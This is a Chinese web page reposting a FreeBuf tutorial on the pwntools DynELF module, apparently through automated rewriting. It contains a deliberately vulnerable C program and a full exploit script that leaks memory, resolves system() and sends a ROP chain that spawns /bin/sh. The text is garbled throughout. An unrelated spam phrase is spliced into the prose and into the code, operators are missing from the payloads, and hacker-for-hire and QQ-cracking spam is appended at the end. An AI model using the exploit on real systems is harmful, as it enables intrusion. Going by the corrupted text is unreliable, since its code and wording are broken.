掏钱调研一个人违反规定吗-Pwntools之DynELF原理研究
*文中作者:xmwanth,文中属 FreeBuf 原創奖赏方案,未经审批同意严禁转截。
DynELF是pwntools中专业用于解决沒有libc状况的漏洞检测控制模块,在出示一个目标程序任意详细地址内存泄漏涵数的状况下,能够分析任意载入库的任意符号详细地址。文中将对其技术性原理开展详细介绍,在其中涉及到ELF文档中的hash表、动态性符号表、字符串数组表、Dynamic段,及其link_map构造等內容。
一、DynELF运用实例
目标程序源码:
#include <stdio.h>
#达雅高验血报告15个D检查报告include <stdlib.h>
#include <unistd.h>
void vulfun(){
char buf[128];
read(STDIN_FILENO, buf, 256);
}
int main(int argc, char** argv){
vulfun();
write(STDOUT_FILENO, "Hello,World\ ", 13);
}
poc:
#!/达雅高验血报告15个D检查报告usr/bin/env python
from pwn import *
elf = ELF('vul_elf')
plt_write = elf.symbols['write']
plt_read = elf.symbols['read']
vulfun_addr = 0x08048404
def leak(address):
payload1 = 'a'*140 p32(plt_write) p32(vulfun_addr) p32(1) p32(address) p32(4)
达雅高验血报告15个D检查报告 p.send(payload1)
data = p.recv(4)
return data
p = process('./vul_elf')
d=DynELF(leak, ptr)
system_addr = d.lookup('system', 'libc')
bss_addr = 0x0804a018
pppr = 0x080484bd
payload2 = 'a'*140 p32(plt_read) p32(pppr) p32(0) p32(bss_addr) p32(8) 达雅高验血报告15个D检查报告 p32(system_addr) p32(vulfun_addr) p32(bss_addr)
p.send(payload2)
p.send("/bin/sh\\0")
p.interactive()
二、DynELF原理
在实例中,运用DynELF的编码是:
d=DynELF(leak, ptr)system_addr = d.lookup('system', 'libc')
能够见到,DynELF功效是寻找system涵数在运行内存中的加达雅高验血报告15个D检查报告载详细地址,下边对该全过程开展详细介绍:
1、获得vul_elf运行内存载入基详细地址
已经知道vul_elf载入运行内存范畴内的一个详细地址ptr,将该详细地址开展页两端对齐
page_size = 0x1000page_mask = ~(page_size - 1)ptr &= page_mask
随后比照运行内存页起止字符串数组是不是为’\\x7fELF’,要不是,一直向低详细地址运行内存页(ptr -= page_size)开展搜索,寻找合乎该标准的网页页面,该网页页面起止详细地址便是vul_elf文件运行内存载入基详细地址。
找寻达雅高验血报告15个D检查报告vul_elf运行内存载入基详细地址的平面图以下:
2、获得libc.so运行内存载入基详细地址
vul_elf是动态链接的可执行程序,在该种类文档中有一个link_map双向链表,在其中包括了每一个动态性载入的库的途径和载入基址等信息内容,其算法设计为:
能够根据二种方式获得link_map链表:一是在全部ELF文档中,根据Dynamic段DT_DEBUG地区获得。二是在non-RELRO 达雅高验血报告15个D检查报告 ELF文档中,link_map详细地址存有于.got.plt区节中,该区域节的载入详细地址能够从DYNAMIC段DT_PLTGOT地区获得。
这二种方式都必须了解vul_elf的DYNAMIC段详细地址:我们在之一步中获得了vul_el运行内存载入基详细地址,从而能够获得vul_elf段表,根据分析vul_elf段表能够获得DYNAMIC基详细地址。
根据第二种 *** 获得link_map构造的平面图以下:
3、获得libc.so的hash表、动态性符号表、字符串数组表基详细地址
在全部必须导出来涵数给其他文件应用的ELF文档(比如: “libc.so”)中,用动达雅高验血报告15个D检查报告态符号表、字符串数组表、hash表等一系列表用以标示导出来标记(比如:”system”)的名字、详细地址、hash值等信息内容。根据libc.so的Dynamic段DT_GNU_HASH、DT_SYMTAB、DT_STRTAB能够获得hash表、动态性符号表、字符串数组表在运行内存中的基详细地址。
4、根据hash表获得system涵数详细地址
hash表是用以搜索标记的散列表,根据libc.so的hash表能够寻找system涵数运行内存载入详细地址,在ELF文档中有SYSV、GNU二种种类的hash表,在其中根据GNU HASH查找system涵数详细地址平面图以下。其找寻全过程涉及到众多关键点,在这里很少描述,后边会达雅高验血报告15个D检查报告发表文章对根据hash表寻找标记详细地址作专业解读。
图上: nbuckets是hash buckets的标值,symndx是hash表投射符号表的起止数据库索引,Bloom Filter作为过虑没有符号表中的符号名称,在DynELF中并沒有应用:
hash=gnu_hash(“system”),gnu_hash是GNU HASH优化算法涵数ndx=hash%nbuckets,ndx是符号表中全部 标记HASH%nubuckets 相同的起止达雅高验血报告15个D检查报告数据库索引
最终:内存泄露涵数在全过程中作为载入程序流程运行内存数据信息,像上边事例中获得link_map、DYNAMIC段、vul_elf段表等內容全是根据内存泄露涵数。
你知道不知道手机有一个手机软件称为中国高校mooc,那里边有很多解读 *** 黑客的专业知识,你努力学习一下。掏钱调研一个人违反规定吗
先做事后支付的 *** 黑客手机微信当然大城市 ? ? (2003) 电影导演: 闵丙天 导演: 闵丙天 出演: 刘智泰 / 徐琳 / 李在恩 / 郑恩彪 / 。
掏钱调研一个人违反规定吗您好,天地沒有免费午餐,说白了能够刷或让你固件的,并不是骗子公司便是盗号木马!假如好些的 *** ,请立即官方网申请办理吧,这才达雅高验血报告15个D检查报告是唯一的方式!
小编的确较为懒了一点,但是许多 真实有成分的 *** 黑客恶性事件新闻媒体的非常少的,看一下楼顶诸位贴的就知道,绝大多数全是运用见习啊內部工作员啊,老实巴交说,这些是为了更好地。
全是假的啊,别信。一开始给你打好几百,之后一个小时后就要你打好几千了,说成担保金,百度搜索上这种全是自身给自己做宣传策划的。掏钱调研一个人违反规定吗
。破解qq室内空间哪些?破解qq室内空间管理权限吗?假如另一方设定了 *** 空间管理权限,必须另一方自身消除管理权限才能够进到。1、只有根据正当性 *** 浏览,获得室内空间管理权限主人家许。
掏钱调研一个人违反规定吗 *** 黑客的这类个人行为是违反规定的,若客户发觉能够去警报。宪法学第四十条要求:中华共和国中国公民的通讯随意和通讯密秘受法律法规保达雅高验血报告15个D检查报告护。除因国防安全或是查证违法犯罪的。
标签:
版权声明
本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
